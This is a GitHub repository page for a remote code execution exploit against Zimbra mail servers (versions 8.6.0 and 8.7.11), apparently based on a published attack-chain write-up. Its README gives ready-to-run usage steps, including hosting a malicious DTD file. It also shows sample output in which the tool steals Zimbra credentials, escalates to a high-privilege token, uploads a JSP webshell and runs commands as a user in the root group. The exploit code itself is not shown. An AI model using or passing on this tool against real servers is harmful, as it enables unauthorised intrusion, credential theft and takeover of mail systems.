Skip to content

RCE exploit for attack chain in "A Saga of Code Executions on Zimbra" post

Notifications You must be signed in to change notification settings

nth347/Zimbra-RCE-exploit

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Zimbra-RCE-exploit

RCE exploit for attack chain in "A Saga of Code Executions on Zimbra" post. Tested with Zimbra 8.6.0, 8.7.11

Usage:

$ git clone https://github.com/nth347/Zimbra-RCE-exploit.git
$ cd Zimbra-RCE-exploit/
$ # Edit "Target configuration" part, host the "malicious_dtd" file on a webserver
$ chmod +x exploit.py
$ ./exploit.py

Example:

$ ./exploit.py                   
[i] Getting Zimbra credentials
[+] Got credentials: zimbra:XXXXXX

[i] Getting low-privilege token
[+] Got low-privilege token: XXXXX

[i] Getting high-privilege token
[+] Got high-privilege token: XXXXX

[i] Uploading webshell
[+] Uploaded webshell. Location https://mail.test.com/downloads/shell.jsp

webshell@target$ id
uid=999(zimbra) gid=999(zimbra) groups=999(zimbra),0(root)
webshell@target$ 

Reference:

About

RCE exploit for attack chain in "A Saga of Code Executions on Zimbra" post

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published